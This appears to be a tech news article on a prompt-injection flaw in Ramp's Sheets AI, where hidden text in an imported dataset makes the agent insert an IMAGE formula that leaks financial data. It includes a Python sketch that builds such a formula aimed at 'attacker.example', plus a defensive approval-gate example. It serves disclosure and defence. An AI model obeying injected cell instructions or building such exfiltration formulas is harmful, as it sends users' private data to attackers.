Security researchers at PromptArmor found a nasty vulnerability in Ramp's Sheets AI that could silently leak your financial data to an attacker's server. The attack works through indirect prompt injection: someone hides malicious instructions in an external dataset using white-on-white text, you import that dataset to compare against your internal financials, and Ramp's AI follows the hidden commands instead of your actual request. It builds an IMAGE formula with your sensitive data embedded in the URL, inserts it into your spreadsheet, and your data gets sent to the attacker. All without asking you for permission.
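The exfiltration step hinges on the fact that a spreadsheet formula's URL doubles as a data channel: when the sheet renders the "image," it makes an HTTP request, and the query string carries whatever the agent packed into it. A minimal Python sketch of how an injected instruction might assemble such a formula (the attacker host and cell values here are hypothetical, not from the actual attack):

```python
from urllib.parse import quote

def build_exfil_formula(cell_values, attacker_host="attacker.example"):
    """Illustrative only: pack spreadsheet data into an IMAGE formula's URL.

    When the spreadsheet tries to render the "image", it requests this
    URL, and the query string delivers the data to the attacker's server.
    """
    payload = quote("|".join(cell_values))
    return f'=IMAGE("https://{attacker_host}/pixel.png?d={payload}")'

formula = build_exfil_formula(["Q3 revenue: 4.2M", "burn: 800k"])
print(formula)
```

The key point is that nothing here looks like malware to a conventional scanner: it is a syntactically ordinary formula whose side effect is the leak.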

It's disturbingly simple. The agent edits spreadsheets with no human-in-the-loop check. No approval step, no "are you sure?" dialog. Just an AI reading cell contents as instructions and acting on them. PromptArmor found nearly the same flaw in Anthropic's Claude for Excel, where malicious formulas could trigger data exfiltration even though that product technically had human review built in. Anthropic fixed it by adding a red warning interstitial that displays the full formula before insertion.
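Anthropic's fix amounts to a human-in-the-loop gate: surface the full formula and require explicit approval before it touches the sheet. A rough sketch of what such a gate could look like, with an invented risk check and a hypothetical `approve` callback standing in for the warning UI:

```python
import re

# Formula functions that can trigger outbound network requests.
RISKY_FUNCS = re.compile(r"=\s*(IMAGE|IMPORTDATA|IMPORTXML|IMPORTHTML)\b", re.I)

def gate_formula(cell, formula, approve):
    """Require explicit human approval before inserting a risky formula.

    `approve` is a callback that shows the user the full formula and
    returns True only on explicit confirmation; anything less blocks
    the insertion instead of silently proceeding.
    """
    if RISKY_FUNCS.search(formula):
        if not approve(f"AI wants to insert into {cell}:\n{formula}\nAllow?"):
            return False  # blocked: no silent edit
    return True  # a real agent would now write the formula to the sheet

blocked = gate_formula("B2", '=IMAGE("https://evil.example/p?d=secret")',
                       approve=lambda msg: False)   # user declines -> False
allowed = gate_formula("B3", "=SUM(A1:A10)",
                       approve=lambda msg: False)   # benign, no prompt -> True
```

The design choice worth noting: benign formulas pass through without friction, so the approval dialog only fires when the formula can reach the network, which is exactly where the exfiltration risk lives.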

Ramp's case took longer to resolve. PromptArmor disclosed the vulnerability on February 19, 2026, and followed up twice before Ramp confirmed receipt on March 14, attributing the delay to a transition between disclosure programs. Two days later, on March 16, Ramp confirmed the issue was fixed.

Ramp isn't the real issue here. Agentic spreadsheets from Microsoft, Google, and others all share this same architectural flaw. LLMs ingest cell contents as prompt context, blurring the line between data and executable instructions. Researchers have shown that models from OpenAI and Anthropic can be tricked into generating malicious IMAGE or IMPORT formulas that bypass standard filters. We're essentially reliving the macro virus era of the 1990s, but now the attacks come wrapped in natural language that AI agents happily interpret and execute.